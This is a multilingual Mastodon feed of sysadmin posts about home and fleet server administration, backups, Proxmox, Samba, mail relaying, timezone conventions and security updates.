                                                                                                                                                                                                                                                                                                                                          ▫️ Custom opencode Skill „log-summary" — liest Log, fasst zusammen, sendet per Mail
                                                                                                                                                                                                                                                                                                                                          ▫️ Cron-Job: täglich 01:00 → Check → Zusammenfassung → Mail 📧

                                                                                                                                                                                                                                                                                                                                          Jeden Morgen eine kompakte Übersicht im Postfach — alle Temperaturen einzeln, SMART-Status, Storage, Updates. Nur Alarme wenn was nicht stimmt.

                                                                                                                                                                                                                                                                                                                                          Tech-Stack: Ubuntu 26.04, smartmontools, lm-sensors, dmidecode, mergerfs, opencode AI, Python smtplib, cron

                                                                                                                                                                                                                                                                                                                                          thanks to:

                                                                                                                                                                                                                                                                                                                                            AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                            [?]Stefano Marinelli » 🌐
                                                                                                                                                                                                                                                                                                                                            @stefano@mastodon.bsd.cafe

                                                                                                                                                                                                                                                                                                                                            Just...no

                                                                                                                                                                                                                                                                                                                                            root@debhost:~# mount -o remount /
                                                                                                                                                                                                                                                                                                                                            mount: (hint) your fstab has been modified, but systemd still uses
                                                                                                                                                                                                                                                                                                                                            the old version; use 'systemctl daemon-reload' to reload.
                                                                                                                                                                                                                                                                                                                                            root@debhost:~# systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                            root@debhost:~# mount -o remount /
                                                                                                                                                                                                                                                                                                                                            root@debhost:~#

                                                                                                                                                                                                                                                                                                                                              [?]Jonathan Kamens 86 47 » 🌐
                                                                                                                                                                                                                                                                                                                                              @jik@federate.social

                                                                                                                                                                                                                                                                                                                                              In other news, I've spent hours today dealing with the fact that Spamhaus says there's malware sending spam from the IPv6 range which is supposedly reserved by Akamai for my mail server.
                                                                                                                                                                                                                                                                                                                                              So far I can't find any evidence that my server is compromised, but I've jerryrigged a monitor that will tell me if any processes other than sendmail are making outbound port 25 connections, so I'm hoping if it happens again that'll help me find it.
                                                                                                                                                                                                                                                                                                                                              It's always something. *sigh*

                                                                                                                                                                                                                                                                                                                                                JP Mens boosted

                                                                                                                                                                                                                                                                                                                                                [?]Anton » 🌐
                                                                                                                                                                                                                                                                                                                                                @anton@social.dollmaier.name

                                                                                                                                                                                                                                                                                                                                                Dear #lazyweb,
                                                                                                                                                                                                                                                                                                                                                I'm finding myself in a discussion that a partner expects their system to run in local timezone (Europe/Berlin), while we sysadmins have configured the whole fleet as UTC (as one should do).
                                                                                                                                                                                                                                                                                                                                                I remember an article that explains why, for SQL servers, #UTCorGTFO. The latter has obviously a wide audience ( https://wiert.me/2022/11/08/utc-and-iso-8601-or-gtfo/, https://www.netmeister.org/blog/ops-lessons.html), but I fail to find any structured reasoning why UTC is the best choice.

                                                                                                                                                                                                                                                                                                                                                Can you help me out?


                                                                                                                                                                                                                                                                                                                                                #UTC #MySQL #sysadmin

                                                                                                                                                                                                                                                                                                                                                  AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                  [?]VibeOps » 🌐
                                                                                                                                                                                                                                                                                                                                                  @vibeops@techhub.social

                                                                                                                                                                                                                                                                                                                                                  🐧 Ubuntu Fileserver in eine Windows-Domäne integriert — und es war satisfying! 🚀

                                                                                                                                                                                                                                                                                                                                                  Was wir gebaut haben:
                                                                                                                                                                                                                                                                                                                                                  ▫️ Domänenbeitritt via realmd/SSSD zu Active Directory
                                                                                                                                                                                                                                                                                                                                                  ▫️ mergerfs-Pool: 374 GB NVMe + 18 TB HDD = ~18,5 TB vereinter Storage
                                                                                                                                                                                                                                                                                                                                                  ▫️ Samba als Domain Member mit winbind ID-Mapping
                                                                                                                                                                                                                                                                                                                                                  ▫️ ACL-Support für Windows-kompatible Berechtigungen
                                                                                                                                                                                                                                                                                                                                                  ▫️ AD-Gruppen steuern den Zugriff auf Freigaben

                                                                                                                                                                                                                                                                                                                                                  Das Besondere: mergerfs lässt jede Platte einzeln ansprechbar. Bei Plattenausfall sind nur die Daten darauf weg — kein RAID-Overhead, dafür TSM-Backup pro Platte. Perfekt für Cold Data.

                                                                                                                                                                                                                                                                                                                                                  Samba läuft mit acl_xattr, NTFS-ACLs werden als xattr auf ext4 gespeichert. Windows-Clients verbinden sich nahtlos mit Domänen-Credentials.

                                                                                                                                                                                                                                                                                                                                                  Der i5-12400 langweilt sich dabei mit 90% Idle. 📉

                                                                                                                                                                                                                                                                                                                                                  Tech-Stack: Ubuntu 26.04, realmd, SSSD, Samba, winbind, mergerfs, ext4

                                                                                                                                                                                                                                                                                                                                                  thanks n credits to:

                                                                                                                                                                                                                                                                                                                                                  =)

                                                                                                                                                                                                                                                                                                                                                    🗳

                                                                                                                                                                                                                                                                                                                                                    [?]Chris Siebenmann » 💀 🌐
                                                                                                                                                                                                                                                                                                                                                    @cks@mastodon.social

                                                                                                                                                                                                                                                                                                                                                    Sysadmins of the Fediverse, I'm curious what people consider to be a 'large fleet' of servers to operate (physical or virtual), so here's a poll.

                                                                                                                                                                                                                                                                                                                                                    (Boosts welcome, as are replies if you think other factors matter or if it differs between physical and virtual.)

                                                                                                                                                                                                                                                                                                                                                    10 systems is large/lots:0
                                                                                                                                                                                                                                                                                                                                                    50 systems is large/lots:1
                                                                                                                                                                                                                                                                                                                                                    100 systems is large/lots:3
                                                                                                                                                                                                                                                                                                                                                    500 systems is large/lots:1
                                                                                                                                                                                                                                                                                                                                                      AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                      [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                                                                      @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                                                                      Petit rappel utile : Nginx Proxy Manager fait aussi office de bouclier ! 🛡️
                                                                                                                                                                                                                                                                                                                                                      Pratique pour verrouiller les fichiers sensibles et ne laisser passer que le LAN et les IP de confiance. Simple, rapide, efficace.

                                                                                                                                                                                                                                                                                                                                                        AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                        [?]Michael » 🌐
                                                                                                                                                                                                                                                                                                                                                        @mkleger@swissodon.ch

                                                                                                                                                                                                                                                                                                                                                        🚀 BackupPilot Beta 6 verfügbar
                                                                                                                                                                                                                                                                                                                                                        Neu mit Unterstützung für Zertifikats-Fingerprints bei selbstsignierten Zertifikaten, weiteren Verbesserungen und Paketen für Debian/Ubuntu (.deb), Fedora/RHEL/Rocky/AlmaLinux (.rpm) sowie Flatpak.

                                                                                                                                                                                                                                                                                                                                                        🔍 Tester gesucht!
                                                                                                                                                                                                                                                                                                                                                        Wir suchen Feedback zu Installation, Bedienung sowie Backup- und Wiederherstellungsfunktionen auf möglichst vielen Linux-Distributionen.

                                                                                                                                                                                                                                                                                                                                                        📦 Download:
                                                                                                                                                                                                                                                                                                                                                        files.onesystems.ch/backuppilot

                                                                                                                                                                                                                                                                                                                                                          AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                          [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                                                                          @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                                                                          ⌨️ Gagne du temps sur ton terminal !
                                                                                                                                                                                                                                                                                                                                                          Je partage mon fichier d'alias Bash pour administrer Nginx Proxy Manager, Fail2Ban et GeoIP en un clin d'œil.
                                                                                                                                                                                                                                                                                                                                                          👉 wiki.blablalinux.be/fr/alias-b 🚀

                                                                                                                                                                                                                                                                                                                                                          AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                          [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                                                                          @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                                                                          Avis de tempête sur le serveur !
                                                                                                                                                                                                                                                                                                                                                          Quand le géoblocage IPv6 passe à la vitesse supérieure, ça donne ça : un joli mur d'IP qui n'iront pas plus loin ❌
                                                                                                                                                                                                                                                                                                                                                          Sécurité max en place, mes conteneurs respirent ! 🛡️

                                                                                                                                                                                                                                                                                                                                                            AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                            [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                                                                            @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                                                                            Fred de CLX boosted

                                                                                                                                                                                                                                                                                                                                                            [?]Stefano Marinelli » 🌐
                                                                                                                                                                                                                                                                                                                                                            @stefano@mastodon.bsd.cafe

                                                                                                                                                                                                                                                                                                                                                            At 19:00 I receive a notification: the backup server has problems. I log in and check: a drive had died. No big deal; since it's a RAIDZ1, the system kept running. I had already copied the EFI partitions and set things up, so it would be able to boot from the other drives as well. I request a replacement from Hetzner, which they carry out in less than half an hour. Despite being hot-swappable, the server detects the disconnection of another drive and crashes. At that point, I ask them to look into it, and they test the machine. Reboot: it won't start. I request a KVM console. I get it: I had forgotten to update the ⁠fstab⁠ and it was trying to mount ⁠/boot/efi⁠ from ⁠ada0p1⁠, but ⁠ada0⁠ was the replaced drive, and it wouldn't go any further.
                                                                                                                                                                                                                                                                                                                                                            Fixed the ⁠fstab⁠, recreated the partitions, rebooted, and issued the ZFS command for resilvering.
                                                                                                                                                                                                                                                                                                                                                            Result: resilvering in progress and backups working again.

                                                                                                                                                                                                                                                                                                                                                            I can turn off the computer and start my Friday evening.

                                                                                                                                                                                                                                                                                                                                                            My laptop, with its BSD Cafe sticker and my glasses on it

                                                                                                                                                                                                                                                                                                                                                            Alt...My laptop, with its BSD Cafe sticker and my glasses on it

                                                                                                                                                                                                                                                                                                                                                              AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                              [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                                                                              @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                                                                              Avis aux fans de Proxmox !
                                                                                                                                                                                                                                                                                                                                                              La version 1.1 de Proxmox Datacenter Manager vient de sortir ! Si vous gérez plusieurs clusters et que vous rêviez d'avoir des super-pouvoirs pour tout centraliser au même endroit (et avec style), c'est le moment de jeter un œil.
                                                                                                                                                                                                                                                                                                                                                              Toutes les nouveautés sont ici :
                                                                                                                                                                                                                                                                                                                                                              👉 proxmox.com/en/about/company-d

                                                                                                                                                                                                                                                                                                                                                                [?]Haack’s Networking » 🌐
                                                                                                                                                                                                                                                                                                                                                                @oemb1905@gnulinux.social

                                                                                                                                                                                                                                                                                                                                                                🛜 GNU/Linux Social has open registration.

                                                                                                                                                                                                                                                                                                                                                                Register➡️ gnulinux.social

                                                                                                                                                                                                                                                                                                                                                                Requirements:
                                                                                                                                                                                                                                                                                                                                                                - accounts must be of and about free software and its surrounding culture and background
                                                                                                                                                                                                                                                                                                                                                                - modest personal and/or recreational use is allowed, e.g., art, music, pics of fam, etc.
                                                                                                                                                                                                                                                                                                                                                                - companies/businesses are allowed only if they are floss
                                                                                                                                                                                                                                                                                                                                                                - follow full ToS/CoC

                                                                                                                                                                                                                                                                                                                                                                Already a member? Want to give back?
                                                                                                                                                                                                                                                                                                                                                                Donate ▶️ liberapay.com/oemb1905/

                                                                                                                                                                                                                                                                                                                                                                some 2008-2012 ish super micros and replacement parts

                                                                                                                                                                                                                                                                                                                                                                Alt...some 2008-2012 ish super micros and replacement parts

                                                                                                                                                                                                                                                                                                                                                                  [?]ppom » 🌐
                                                                                                                                                                                                                                                                                                                                                                  @ppom@mamot.fr

                                                                                                                                                                                                                                                                                                                                                                  reaction v2.4.0 is out!
                                                                                                                                                                                                                                                                                                                                                                  Updates:
                                                                                                                                                                                                                                                                                                                                                                  - JSON log parsing (much handier than regexes for JSON logs!)
                                                                                                                                                                                                                                                                                                                                                                  - Smarter database
                                                                                                                                                                                                                                                                                                                                                                  - Important bugfixes

                                                                                                                                                                                                                                                                                                                                                                  framagit.org/ppom/reaction/-/r

                                                                                                                                                                                                                                                                                                                                                                    [?]Michael T Babcock [https://en.pronouns.page/@bigntallmike] » 🌐
                                                                                                                                                                                                                                                                                                                                                                    @mikebabcock@floss.social

                                                                                                                                                                                                                                                                                                                                                                    Personal computing safety goals because of supply chain attacks and possible future issues: create new user account for new projects, clone and test repos in that account only.
                                                                                                                                                                                                                                                                                                                                                                    Is it hard? No. Could I automate it? maybe. Would it be nice to have built into say conda? Absolutely.

                                                                                                                                                                                                                                                                                                                                                                      [?]Fränçe Licôrne » 🌐
                                                                                                                                                                                                                                                                                                                                                                      @alter_unicorn@masto.bike

                                                                                                                                                                                                                                                                                                                                                                      `strace --tips`

                                                                                                                                                                                                                                                                                                                                                                        [?]skotperez » 🌐
                                                                                                                                                                                                                                                                                                                                                                        @skotperez@voragine.net

                                                                                                                                                                                                                                                                                                                                                                        Starting Applications Automatically After Reboot Using PM2

                                                                                                                                                                                                                                                                                                                                                                        [?]Haack’s Networking » 🌐
                                                                                                                                                                                                                                                                                                                                                                        @oemb1905@gnulinux.social

                                                                                                                                                                                                                                                                                                                                                                        🐧 Looking for a community to discuss or ?

                                                                                                                                                                                                                                                                                                                                                                        🤨 Looking for a community @element instance to use for secure communications?

                                                                                                                                                                                                                                                                                                                                                                        Register: element.gnulinux.club

                                                                                                                                                                                                                                                                                                                                                                        GNU/Linux Club serves enthusiasts & fans.

                                                                                                                                                                                                                                                                                                                                                                        Requirements:

                                                                                                                                                                                                                                                                                                                                                                        - Official git profile or tech blog
                                                                                                                                                                                                                                                                                                                                                                        - Be 18 years of age or older
                                                                                                                                                                                                                                                                                                                                                                        - Remain active in the pubglug channel
                                                                                                                                                                                                                                                                                                                                                                        - Follow the ToS & CoC

                                                                                                                                                                                                                                                                                                                                                                        🫶Donations➡️liberapay.com/oemb1905/

                                                                                                                                                                                                                                                                                                                                                                        pubglug logo, which says pubglug from bottom left to upper right in purple/blue w/ black bgrnd

                                                                                                                                                                                                                                                                                                                                                                        Alt...pubglug logo, which says pubglug from bottom left to upper right in purple/blue w/ black bgrnd

                                                                                                                                                                                                                                                                                                                                                                          [?]skotperez » 🌐
                                                                                                                                                                                                                                                                                                                                                                          @skotperez@voragine.net

                                                                                                                                                                                                                                                                                                                                                                          endoflife.date

                                                                                                                                                                                                                                                                                                                                                                          Captura de pantalla de endoflife.date

                                                                                                                                                                                                                                                                                                                                                                          Alt...Captura de pantalla de endoflife.date

                                                                                                                                                                                                                                                                                                                                                                          [?]Haack’s Networking » 🌐
                                                                                                                                                                                                                                                                                                                                                                          @oemb1905@gnulinux.social

                                                                                                                                                                                                                                                                                                                                                                          🤔Are you an or content creator?

                                                                                                                                                                                                                                                                                                                                                                          👀Are you an or organization that needs a place to host your meetups/presentations?

                                                                                                                                                                                                                                                                                                                                                                          🔥GNU/Linux Tube has open registration‼️

                                                                                                                                                                                                                                                                                                                                                                          gnulinux.tube

                                                                                                                                                                                                                                                                                                                                                                          - 10GB daily upload default
                                                                                                                                                                                                                                                                                                                                                                          - 100GB video quota default
                                                                                                                                                                                                                                                                                                                                                                          - Custom vp9 & opus CPU transcoding
                                                                                                                                                                                                                                                                                                                                                                          - Quarterly updates & maintenance
                                                                                                                                                                                                                                                                                                                                                                          - All volunteer devs @sen @oemb1905

                                                                                                                                                                                                                                                                                                                                                                          Donate: liberapay.com/oemb1905/

                                                                                                                                                                                                                                                                                                                                                                            AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                            [?]Stefano Marinelli » 🌐
                                                                                                                                                                                                                                                                                                                                                                            @stefano@mastodon.bsd.cafe

                                                                                                                                                                                                                                                                                                                                                                            FediMeteo, timezones, and the art of not breaking what already works

                                                                                                                                                                                                                                                                                                                                                                            From a simple Italian script to managing 1200+ US cities, timezones, and a secret-leaking crisis. How I completely rebuilt the FediMeteo backend without breaking the Unix-style infrastructure around it.

                                                                                                                                                                                                                                                                                                                                                                            it-notes.dragas.net/2026/05/25

                                                                                                                                                                                                                                                                                                                                                                              AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                              [?]matthew - retroedge.tech » 🌐
                                                                                                                                                                                                                                                                                                                                                                              @matthew@social.retroedge.tech

                                                                                                                                                                                                                                                                                                                                                                              I am documenting a repetitive process.

                                                                                                                                                                                                                                                                                                                                                                              Most importantly, so I have notes so I can manually do it again... but also considering writing a bash shell script to mostly automate.

                                                                                                                                                                                                                                                                                                                                                                              If I do that, it would be one of the longest and most ambitious shell scripts I've done. A little intimidating, but I think I'll be able to pull it off.

                                                                                                                                                                                                                                                                                                                                                                              Probably will save a lot of time later. And even if it doesn't, I will have learned quite a bit.

                                                                                                                                                                                                                                                                                                                                                                              #sysadmin #linux #bash

                                                                                                                                                                                                                                                                                                                                                                                AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                                [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                                                                                                @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                                                                                                🎙️ Marre de perdre la connexion avec tes potes sur Mumble à cause d'une IP dynamique ? 🔄❌

                                                                                                                                                                                                                                                                                                                                                                                Pas besoin de passer par un service de DynDNS tiers ou une usine à gaz ! Dans ce nouveau guide sur le Wiki, on voit comment automatiser proprement la mise à jour de ton IP publique pour que ton serveur Mumble reste toujours joignable, quoi qu'il arrive 🛠️📡

                                                                                                                                                                                                                                                                                                                                                                                👉 Le tuto est dispo ici : wiki.blablalinux.be/fr/mise-a-

                                                                                                                                                                                                                                                                                                                                                                                Bonne lecture et bon déploiement ! 💯

                                                                                                                                                                                                                                                                                                                                                                                  [?]Haack’s Networking » 🌐
                                                                                                                                                                                                                                                                                                                                                                                  @oemb1905@gnulinux.social

                                                                                                                                                                                                                                                                                                                                                                                  For the record, I'm fully supportive of and/or - it's essentially free form input statistical software. Use it wisely, be aware of.confirmation bias, use to augment (not replace) or simplify repetitive/tedious work, etc. Support models and companies that encourage this responsible usage. Model it yourself and disclose responsible usage transparently. It's not difficult, really.

                                                                                                                                                                                                                                                                                                                                                                                    AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                                    [?]Haack’s Networking » 🌐
                                                                                                                                                                                                                                                                                                                                                                                    @oemb1905@gnulinux.social

                                                                                                                                                                                                                                                                                                                                                                                    For my shop machine, I'm now actively testing Debian 14 Testing w/ Xlibre and SonicDE. So far, so good. I use this machine for client work and it also gets to be my guinea pig for testing drawing tablet workflows. Both native Xlibre (via wacom) and Gaomon's proprietary driver work. I'm impressed with how snappy SonicDE is - first time using it today. Great work folks‼️

                                                                                                                                                                                                                                                                                                                                                                                    @sonicdesktop @XLibreDev

                                                                                                                                                                                                                                                                                                                                                                                    fastfetch screenshot for xlibre, debian 14/testing, and sonicde workstation

                                                                                                                                                                                                                                                                                                                                                                                    Alt...fastfetch screenshot for xlibre, debian 14/testing, and sonicde workstation

                                                                                                                                                                                                                                                                                                                                                                                      AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                                      [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                                                                                                      @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                                                                                                      Ces pages sont juste là pour t'aider à piger rapidement à quoi on a affaire et comprendre en un coup d'œil ce que proposent concrètement ces outils. Idéal pour faire le tour du propriétaire en 2 minutes chrono ⚙️🚀

                                                                                                                                                                                                                                                                                                                                                                                      👉 Découvre ça sur le Wiki : wiki.blablalinux.be

                                                                                                                                                                                                                                                                                                                                                                                      Bonne lecture ! 💯

                                                                                                                                                                                                                                                                                                                                                                                        [?]Michael T Babcock [https://en.pronouns.page/@bigntallmike] » 🌐
                                                                                                                                                                                                                                                                                                                                                                                        @mikebabcock@floss.social

                                                                                                                                                                                                                                                                                                                                                                                        @zwol @fuzzyfuzzyfungus @0xabad1dea it's absolutely possible. Apache does it. Qmail did it. Nothing you're writing is more complex than those. Drop privileges. Run every service as a different user. Use mandatory access controls. The tools exist.

                                                                                                                                                                                                                                                                                                                                                                                          AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                                          [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                                                                                                          @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                                                                                                          🖥️ Besoin d'une interface sympa pour gérer tes conteneurs Proxmox ? Découvre PegaProx !

                                                                                                                                                                                                                                                                                                                                                                                          J'ai partagé le fichier Docker Compose complet sur mon instance ByteStash, et cerise sur le gâteau : la configuration complète NPM (Nginx Proxy Manager) est présente pour te simplifier la vie à 100 %. Déploiement propre et rapide garanti ! ⚙️🚀

                                                                                                                                                                                                                                                                                                                                                                                          👉 Récupère le snippet ici : bytestash.blablalinux.be/s/0b9

                                                                                                                                                                                                                                                                                                                                                                                          Bon test et bon déploiement ! 💯

                                                                                                                                                                                                                                                                                                                                                                                            AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                                            [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                                                                                                            @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                                                                                                            💥 Avoir des sauvegardes c'est bien, être SÛR qu'elles fonctionnent, c'est mieux ! 💥

                                                                                                                                                                                                                                                                                                                                                                                            Marre de croiser les doigts en espérant que tes dumps SQL soient valides le jour du crash ? 🤞❌

                                                                                                                                                                                                                                                                                                                                                                                            Dans ce nouveau guide étape par étape sur le Wiki, on met en place la vérification automatique des restaurations de tes bases de données avec Databasus. Dormez sur vos deux oreilles ! 😴🛡️

                                                                                                                                                                                                                                                                                                                                                                                            👉 Le guide complet est ici : wiki.blablalinux.be/fr/verific

                                                                                                                                                                                                                                                                                                                                                                                            Bon déploiement ! ⚙️

                                                                                                                                                                                                                                                                                                                                                                                              [?]Cryptolab.re » 🌐
                                                                                                                                                                                                                                                                                                                                                                                              @foudreclair@piaille.fr

                                                                                                                                                                                                                                                                                                                                                                                              Le post-quantique, ce n’est pas juste un sujet de labo.

                                                                                                                                                                                                                                                                                                                                                                                              Côté infra, la vraie question c’est plutôt :
                                                                                                                                                                                                                                                                                                                                                                                              qu’est-ce qui, chez moi, doit rester confidentiel dans 10 ou 20 ans ?

                                                                                                                                                                                                                                                                                                                                                                                              Backups, VPN, SSH, certificats, archives longues durées… j’ai essayé de remettre ça à plat ici :

                                                                                                                                                                                                                                                                                                                                                                                              cryptolab.re/posts/2026/post-q

                                                                                                                                                                                                                                                                                                                                                                                                2 ★ 1 ↺

                                                                                                                                                                                                                                                                                                                                                                                                [?]oldsysops » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                @oldsysops@social.dk-libre.fr

                                                                                                                                                                                                                                                                                                                                                                                                @benjamin@www.octopuce.fr c'est la saison du recrutement on dirait, entre ce poste et celui de framasoft, c'est le des

                                                                                                                                                                                                                                                                                                                                                                                                en tous cas ca a l'air d'un super poste !

                                                                                                                                                                                                                                                                                                                                                                                                  CBO @ le17 boosted

                                                                                                                                                                                                                                                                                                                                                                                                  [?]Octopuce Hébergement » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                  @Octopuce@mamot.fr

                                                                                                                                                                                                                                                                                                                                                                                                  Octopuce recrute une administratrice ou un administrateur système Linux.
                                                                                                                                                                                                                                                                                                                                                                                                  Toutes les informations sont là :
                                                                                                                                                                                                                                                                                                                                                                                                  octopuce.fr/octopuce-recrute-u

                                                                                                                                                                                                                                                                                                                                                                                                  Faites tourner, le retoot amène du travail aux copaines 🐙🥰

                                                                                                                                                                                                                                                                                                                                                                                                    AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                                                    [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                    @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                                                                                                                    Le plein de nouveautés sous le capot : C'est basé sur Debian 13 (Trixie) avec le tout dernier Noyau Linux 7.0, Ceph Tentacle 20.2, LXC 7 et OpenZFS 2.4 ! 🐧

                                                                                                                                                                                                                                                                                                                                                                                                    Bref, de quoi s'amuser sur nos clusters ! L'ISO est déjà dispo pour les mises à jour 😉

                                                                                                                                                                                                                                                                                                                                                                                                    La vidéo officielle juste ici : youtu.be/XBVAiwkVaqA

                                                                                                                                                                                                                                                                                                                                                                                                      Debacle boosted

                                                                                                                                                                                                                                                                                                                                                                                                      [?]Ignite Realtime News » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                      @news@toot.igniterealtime.org

                                                                                                                                                                                                                                                                                                                                                                                                      Openfire deployments have been running in the wild for a *long* time.

                                                                                                                                                                                                                                                                                                                                                                                                      Some started when Java 5 was current, Docker didn't exist yet, and IPv6 was still "future tech".

                                                                                                                                                                                                                                                                                                                                                                                                      As we prepare the Openfire 5.1.0 release, We'd love to hear your stories: What's the oldest Openfire deployment that you still run?

                                                                                                                                                                                                                                                                                                                                                                                                      discourse.igniterealtime.org/t

                                                                                                                                                                                                                                                                                                                                                                                                        3 ★ 0 ↺

                                                                                                                                                                                                                                                                                                                                                                                                        [?]oldsysops » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                        @oldsysops@social.dk-libre.fr

                                                                                                                                                                                                                                                                                                                                                                                                        days without searching online how to put a default gateway on a linux server : 0
                                                                                                                                                                                                                                                                                                                                                                                                        ip route add default via


                                                                                                                                                                                                                                                                                                                                                                                                        why I can't remember that ??
                                                                                                                                                                                                                                                                                                                                                                                                        may be because i use it only once in a year...
                                                                                                                                                                                                                                                                                                                                                                                                        we need more crash server !!


                                                                                                                                                                                                                                                                                                                                                                                                          [?]Jérémy Lecour » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                          @jlecour@mastodon.evolix.org

                                                                                                                                                                                                                                                                                                                                                                                                          Et alors quoi ? On ne peut plus passer une semaine sans faille majeure dans le noyau Linux ?
                                                                                                                                                                                                                                                                                                                                                                                                          github.com/v12-security/pocs/t

                                                                                                                                                                                                                                                                                                                                                                                                            webhat boosted

                                                                                                                                                                                                                                                                                                                                                                                                            [?]Grumpy Old Techie 🕊️ » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                            @grumpyoldtechie@hostux.social

                                                                                                                                                                                                                                                                                                                                                                                                            A little video I picked up in r/shittysysadmin on reddit.
                                                                                                                                                                                                                                                                                                                                                                                                            It speaks to me 🤪😎😬

                                                                                                                                                                                                                                                                                                                                                                                                            Alt...Video of a cute cat telling us how (not) to do networks

                                                                                                                                                                                                                                                                                                                                                                                                              webhat boosted

                                                                                                                                                                                                                                                                                                                                                                                                              [?]Grumpy Old Techie 🕊️ » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                              @grumpyoldtechie@hostux.social

                                                                                                                                                                                                                                                                                                                                                                                                              A little video I picked up in r/shittysysadmin on reddit.
                                                                                                                                                                                                                                                                                                                                                                                                              It speaks to me 🤪😎😬

                                                                                                                                                                                                                                                                                                                                                                                                              Alt...Video of a cute cat telling us how (not) to do networks

                                                                                                                                                                                                                                                                                                                                                                                                                [?]Coukaratcha | クカラチャ » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                @couka@social.coukaratcha.fr

                                                                                                                                                                                                                                                                                                                                                                                                                Initialement, je voulais simplement empêcher le pillage de mon blog par des LLM et autres IA. J’ai fini par découvrir du trafic malveillant dans mes logs d’accès et donc mis en place des solutions pour le bloquer et prévenir des futures attaques.

                                                                                                                                                                                                                                                                                                                                                                                                                blog.coukaratcha.fr/analyser-n

                                                                                                                                                                                                                                                                                                                                                                                                                  [?]Stefano Marinelli » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                  @stefano@mastodon.bsd.cafe

                                                                                                                                                                                                                                                                                                                                                                                                                  EDIT: some things have changed since I wrote this post. Now they're more accurate.

                                                                                                                                                                                                                                                                                                                                                                                                                  AI models don’t really 'get' the BSDs. As a result, they often provide incomplete, imprecise, or flat-out wrong answers by defaulting to Linux paradigms. When it comes to illumos-based systems, they just completely lose the plot.

                                                                                                                                                                                                                                                                                                                                                                                                                  This is becoming a serious issue for the BSDs and illumos ecosystems. We are seeing entire websites flooded with AI-generated tutorials and guides that are totally incorrect. Most people don't realize this; they follow the instructions, fail, and then assume that the BSDs doesn't work well or are 'unstable' because they have supposedly changed since the guide was written.

                                                                                                                                                                                                                                                                                                                                                                                                                  Luckily, some people eventually find my blog, reach out, and finally understand what's actually going on. Others, unfortunately, end up on major social sites or comments, claiming that these systems are broken.

                                                                                                                                                                                                                                                                                                                                                                                                                  In 2026, one of our greatest challenges will be teaching people how to vet their sources and filter information.
                                                                                                                                                                                                                                                                                                                                                                                                                  And I see this as a very, very uphill battle.

                                                                                                                                                                                                                                                                                                                                                                                                                    [?]Haack’s Networking » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                    @oemb1905@gnulinux.social

                                                                                                                                                                                                                                                                                                                                                                                                                    I was having some issues with picky destination servers who were rejecting emails sent via a relay. No matter how clean the records/setup were, emails got rejected.

                                                                                                                                                                                                                                                                                                                                                                                                                    So, I decided to configure exim4 to use satellite mode to send behind NAT without issue. Here's what I came up with using stock exim4 documentation and resources:

                                                                                                                                                                                                                                                                                                                                                                                                                    tech.haacksnetworking.org/2026

                                                                                                                                                                                                                                                                                                                                                                                                                    This is a clean stock setup for workstations behind NAT, VPSs that don't have outgoing smtp, etc.

                                                                                                                                                                                                                                                                                                                                                                                                                      [?]Sheldon [he/him] » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                      @sysop408@sfba.social

                                                                                                                                                                                                                                                                                                                                                                                                                      Anyone out there who runs a Linux server, I hope you've been checking for and applying system updates like mad the past couple of weeks. There have been some very nasty vulnerabilities that hit the open recently that need immediate action.

                                                                                                                                                                                                                                                                                                                                                                                                                      Even if you don't run a server that's not Linux based, you should probably check twice a day for security updates and apply everything you can for the time being. Something that your server relies on definitely is Linux based and you're probably not exempt from potential issues.

                                                                                                                                                                                                                                                                                                                                                                                                                        [?]Larvitz :fedora: » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                        @Larvitz@burningboard.net

                                                                                                                                                                                                                                                                                                                                                                                                                        I’ve been replacing sudo/doas on most of my FreeBSD boxes with something much smaller: mdo(1) + mac_do(4) from base.

